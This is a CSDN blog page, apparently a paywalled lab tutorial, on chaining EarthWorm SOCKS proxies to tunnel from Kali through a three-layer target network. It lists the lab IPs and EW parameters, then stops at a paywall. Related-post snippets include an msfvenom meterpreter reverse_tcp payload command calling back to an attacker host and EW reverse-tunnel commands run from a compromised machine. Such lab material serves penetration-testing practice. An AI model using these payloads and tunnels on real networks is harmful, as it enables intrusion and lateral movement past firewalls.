ew代理三层靶机实验穿透

最新推荐文章于 2025-03-01 20:34:38 发布

karry_test

最新推荐文章于 2025-03-01 20:34:38 发布

阅读量1.3k

点赞数

CC 4.0 BY-SA版权

文章标签： linux 服务器运维 web安全网络

本文链接：https://blog.csdn.net/m0_58595840/article/details/128650687

我的环境：

kali：192.168.1.128

第一层靶机A：192.168.1.166   内网 192.168.52.10

第二层靶机B：192.168.52.20   三层 内网 192.168.93.10

第二层靶机C：192.168.52.30   三层 内网 192.168.93.20

                            靶机D：192.168.93.30
                            靶机E：192.168.93.40

因为只是为了练习ew代理搭建，所以是直接使用密码登录靶机操作，其实跟你渗透测试拿到权限之后操作是一样的啦。

前提知识ew参数：

ssocks：用于普通的网络环境的正向连接
rcsocks：用于反弹连接
rssocks：用于反弹连接
lcx_slave、lcx_listen、lcx_tran用于复杂网络的多级级联
-l 指定要监听的本地端口
-d 指定要反弹到的主机ip
-e 指定要反弹到的主机端口
-f 指定要主动连接的主机ip  //一般都为上一层的出网ip
-g 指定要主动连接的主机端口
-t 指定超长时间，默认1000

第一层靶机：

1.下载ew代理工具，赋予执行权限

git clone https://github.com/idlefire/ew.git
cd ew
chmod +x *

2.第一层靶机是有1的网段跟我们kali攻

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

karry_test

关注关注

0
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

内网渗透-Earthworm的简单使用（内网穿透工具）

lza20001103的博客

08-11

2160

内网渗透-Earthworm的简单使用（内网穿透工具）

[隧道代理] 隧道代理 — 应用层内网代理 - Earthworm（EW）

Blue17 の小窝

02-19

852

Eathworm 工具获取EarthWormEarthworm 简称 EW，是一款便携式的网络穿透工具，具有 SOCKS v5 服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。不过可惜的是，该工具因其影响不好，已经宣布永久停止更新了，现在想下载只能去其他备份地址下载了（笔者上面提供了下载方式）：该工具能够以 “正向”、”反向“、”多级级联“ 等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。

参与评论您还未登录，请先登录后发表或查看评论

【内网—内网转发】——代理转发_ew(Earthworm)代理转发

weixin_45588247的博客

09-11

6730

文章目录一、实验环境：二、工具：三、概念：四、学习目的：五、ew(Earthworm)介绍：六、ew(Earthworm)使用说明：七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP)：1. 场景：2. 网络拓扑图：3. 说明：4. 实验过程：八、ew(Earthworm)反向代理：1. 一级代理：1.1 场景：1.2 网络拓扑图：1.3 说明：1.4 实验过程：2. 二级代理(一)：2.1 场景：2.2 网络拓扑图：2.3 说明：2.4 实验过程：一、实验环境：角色系统

【渗透测试】ew代理三层靶机穿透+proxifier配置规则

serendipity1130的博客

09-02

3191

1.远程连接： ssh [email protected] W6WEwrqD 2.msf生成木马： cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机： scp -p load.elf yansiyu@

ew穿透

小晓晓晓林的博客

02-20

2894

EW是一套便携式的网络穿透工具，具有 SOCKS v5服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。工具包中提供了多种可执行文件，以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内。目前工具提供六种链路状态...

利用EW代理实现内网穿透

qq_54713392的博客

06-10

841

利用EW代理实现内网穿透环境：攻击机：kali ip192.168.32.132 中间机：win7 ip 192.168.32.128 ip2 192.168.1.3 假定为公网vps 内网主机：win32 192.168.1.4 被攻占主机内网测试机：winxp 192.168.1.5 内网扫描机配置：中间机执行 ew_win32.exe -s rcsocks -l 1080 -e 8888 被攻占主机执行 ew_win32.exe -s rssocks -d 192.168.1.3 -e

内网渗透测试：隐藏通讯隧道技术（下）

weixin_43733912的博客

11-03

765

系列文章：内网渗透测试：隐藏通讯隧道技术（上）什么是隧道？在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。上一节中，我们讲解了网络层的隧道技术（IPv6 隧道、ICMP 隧道）

内网隧道代理技术_正向代理隧道

2401_84301227的博客

04-29

823

Web 服务器开启了80端口，3389端口不允许出网，可以通过lcx来将web服务器的3389端口转发到允许出网的53端口，这个时候我们再在vps上启用lcx监听53端口的流量并转发到1111端口，最后直接连接vps的的1111端口，就相当于访问web服务器的3389端口（这里的web服务器是可以在外网访问的）攻击者往往利用端口转发来进入内网对某个特定的服务进行攻击，或者是为了绕过本地防火墙的策略（比如：3389端口不出网，我们可以将其转发至出网的53端口）

内网渗透之——内网转发（反弹shell、端口、代理）

热门推荐

wsnbbz的博客

04-03

1万+

目的渗透测试中，我们往往会面对十分复杂的内网环境，比如最常用的防火墙，它会限制特定端口的数据包出入。需要转发的情况 1.A可以访问B的80端口，但是不能访问B的3389端口。 2.A可以访问B，B可以访问C，但是A不可以访问C，需要通过B转发数据，让A和C进行通信。代理方式正向代理正向代理是客户端主动访问服务器的端口我们常说的代理就是指正向代理，正向代理的过程，它...

内网转发的基本操作

m0_64674174的博客

08-25

2327

我们需要一个代理搭建成功的标志，这里个人使用phstudy搭建网络服务，在失陷主机以及内网主机均开启http服务，已攻击机可以访问到内网主机的http服务为代理成功标志，失陷主机需要上传一些需要的工具，这里关闭失陷主机的安全中心，具体操作为直接搜索安全中心即可。内网穿透和内网转发这俩个概念的话，内网穿透是内网进入到外网，内网转发是指外网进入到内网，但是个人感觉实际功能上并无太大差距，都是为了实现外网能够访问打内网的某些服务，实际上还都是通过设置路由进行转发。

EW代理工具的使用说明

Ays.Ie的博客

05-18

2453

本篇介绍了ew代理转发工具，以及简单的应用

内网穿透-EW贯穿内网

MachineGunJoe666

05-30

1268

EW 官网介绍啊:EW 是一套便携式的网络穿透工具，集socks代理和端口转发与一身，支持正向、反向、多级级联方式为我们打通隧道。而且支持多系统，可在复杂网络环境（win,linux,mac之间）完成网络穿透。官网：http://rootkiter.com/EarthWorm/ 这工具的代理借鉴了ssocks，端口转发是借鉴了Lcx工具的使用方法，今就详细研究研究一下这个工具工具使用这里提一嘴啊，代理和端口转发不太一样代理是我们可以使用它ip进行网络访问端口转发是一...

EW内网穿透详解!

hanjinming110的博客

09-20

2052

总结了一下ew的使用,希望可以和师傅们一起交流沟通!

EarthWorm(ew)：复杂网络环境下端口转发及SOCKS5代理工具

ZL_1618的博客

08-14

2334

本文是在学习了下面参考文章的基础上，基于自己的理解和心得补充了数据流量拓扑图，这样更好理解工具的使用场景和记住命令；本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过，后来耐心的学习一下，打开了新世界。2.动手实践看了很多文章也包括官方的文档；发现对小白来说想了解工具功能和不同场景，单看文字不直观，没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神，整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite；目前EW和Termite作者已经不维护了；

内网穿透工具EW的简单使用（附内网环境实现）

markecheng的博客

12-15

9214

前言 EW全称叫做EarthWorm简称叫做EW，它是一套便携式的网络工具，具有SOCKS5服务架设和端口转发两大核心功能，并且包含着LCX工具的功能，可以再复杂的网络环境实现网络穿透 EW可以已正向和方向以及多级级联的方式建立网络隧道这里示范简单的正向以及反向是实现过程实现环境目标，使用kali攻击机对windows 2008 R2目标服务器进行正向连接以及反向连接过程 1.在EW工具包中，有很多版本，linux有32位的，以及64位的，首先我们需要输入以下命令来查看我们需要运行多少位的ew工具

内网穿透

Jak的博客

04-03

657

一、简介内网穿透功能可以允许我们使用外网的网址来访问主机正常的外网需要访问我们项目的流程是： 1.买服务器并且有公网固定ip 2.买域名映射到服务器的ip 3.域名需要进行备案和审核别的电脑想要访问京东可以访问通别的电脑想要访问我们的电脑肯定是不行了我的电脑是在我的局域网，我访问外网是可以访问通的，外网访问我肯定是不通的。除非我们跟外界装了一个互通的软件，比如QQ 二、使用场景 1.开发测试(微信、支付宝) 2.智慧互联 3.远程控制 4.私有云三、内

EW简单设置代理web服务器

The current road is different, love needs to distinguish between right and wrong

01-21

2877

正向代理服务端我这里是在linux系统上进行监听的，使用的是阿里云的服务器。 ./ew_for_linux64 -s ssocksd -l 2222 #监听本地的2222端口然后设置客户端,windows系统的话直接配置浏览器的代理或是使用类似proxifier的代理软件设置全局代理即可。 linux系统的话配置proxychains代理链的配置文件，设置成监听的ip和端口 vi /etc/proxychains4.conf 然后命令前面加上 proxy.

EW（EarthWorm）创建 socks 代理实战：内网穿透与流量转发的深度解析